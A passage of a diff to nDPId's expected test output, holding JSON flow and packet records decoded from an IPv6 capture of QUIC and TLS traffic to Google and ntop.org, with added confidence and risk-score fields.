AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1448269127425,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"ts_msec":1448269127425,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAABU4ROCoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbuzawVOyY8AAb8WJ6Bcd8sMmCgT1ZAbf9HJtJU65m4+bYpFMYi142VYaY8+t63\/dljK20Pk6Hvm9ZGbc4Et8i29+QvT1kI6MUSu9s3cUHjnw2xTVTxhsAZQm3P8lhXGD3mDtRkg1sEr5Q7cUyyDCLFUAAa6oJdZ2+wjH2gcLInCstN8U\/9bx6mOB4zttEHtP4c5+\/9wVsqFhWr8fRfl3NhWM5wR+Zg8+H9Dwriy2djsTqMxZ15btYw8HWKV3SpS+cchPqkycwN+jDrgd3LuUYlETydIegf69eD\/JtLcKLFbEN5\/5QkOg9oAmwqqCClTPJLTkbez9M4pFkrM2VJDxnT19PvnGpVdwH0wIvKNgr8RVKNTlGILXC+9jJMPkA9tVfHgEWzHqgG+WxljhwAd4QSufx6LSzCoBsf86nBeKfgcGq9lFFZLToMS1VjjSASPtZOvlSLyuxjHryC2XTxpVHUN\/PBKPgXBScR4DFFlJHRdFSNH3eaciyVInAjiCfV6HJYS+DuTQgUqjcyAG5tuDXYslL4LNyVesK76J8Q9FVPv6Ab4vTklEVJejFK80Cn8IouJ9WHz8uTM24UHbOmpAA\/c+EPPNLCB9F8iGG66BwJvUEBHZ3Ygj9rnWqSJgSU55vdrYi5luNP1KoXM4YmziEg8e+xJprdp11YpNV+0lAxdI0zR9s3KRF+wKmv6XtU8gBoCwTHodAHf32dQGfVior2u\/KHctDxD8nHTXU0AZV0DGAOL04YVg9K9w3y4THfVYJpIoP+uyoruQl0rsX9ENsZ5qS+dOXnu5LcoS2EGP16jbi7uY9ogtSWghhTOmmCzmJAGprVn6JTMBLO193Vra3mqDuGuMUOZM\/l8mB81H2MusGIWIde9dns9dj2AG\/cfGaDWSays\/fK3VtGGTBv7FaSH\/aw\/Q2zkhNIJX\/WFH6YUEleLUh25ypFwius1sBxwKIcgK2ijlBJ8pqokusSGJDg\/c4+DqzUrA93\/HrO5AiXdFCeRaHb7qWTzL0p26M50TOgV5ZhM261i0CZOTvKrCn9iZeIH3z5r82ZP101c8INU8PByLFZYWSBQLEx1DNpqjwLojRfhTpMW5JdNN\/sTmhr77P3fBJRr6WfjS8BevHVq9cSi8laxJh0JQkiYq6WSdgUPITf15zal35ZU99gHjN8lHKLEe4ulo25UZrSeatzSMZUm5A91iw1tGWfGpH4DfLZt8Ntly9VWHd\/87hCB87\/piwS6u4+4ryQp4GDxllbW\/SkuP\/IAA9Zuq742fzBVuJkS4BpNCthxU0Qle\/rg\/gQjlJJVbj2FDnbMgmtbocxxIFkNS+NNJJEtuvLnbQCDuw8uZDIIX7G8SvS+F8HVI+jLOPdR15E6Pnf84ervCPA5o0JfpJr+Ni3PIRv3FKi+p5DZaL1kmCkPEBtHdwkl3y2psiuigxSpcsFcwghyrpx9hiMFpPOeQbZd1kDbqrcKz3DwJXNrOM5TljZcc+q\/sTNd3axpOt7TtQGaRTUzdKfgFeiq5EoRUpye4hhSuSwq98WPbz5OcLGEG00xOPY3pwtztgP3Hft4qU9pxAWCD6O+UUk1tCU0r2xCd25EV4iBdLikeLpIHEfcmHIJd72ETZjpLfti3i9QaSkD\/AsqiENwvRS6H7x34vPid3KkvLGz\/SjeWjBz44e2RAwUEkK\/6QdG765SHEZEytfd\/\/s1VN9Lrlmg\/JhogP6qMLZp6e145R0qbs7qAEZeb\/fZQhZM2cMG0S3vs2+Qg8KLzxAegZ7RC0gS+QzKcRpj6NRz\/TYo6NL+7\/Uv2rcnFhb6N0M="}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1448269127426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"ts_msec":1448269127426,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwAtFY4MSb7i0\/DtzNYC4PYSufRYk3sdRNPxvPTHCMs5+9cyKuKyC\/5g"}
@@ -26,19 +26,19 @@
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="}
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
-01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
+00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
+01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="}
-00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 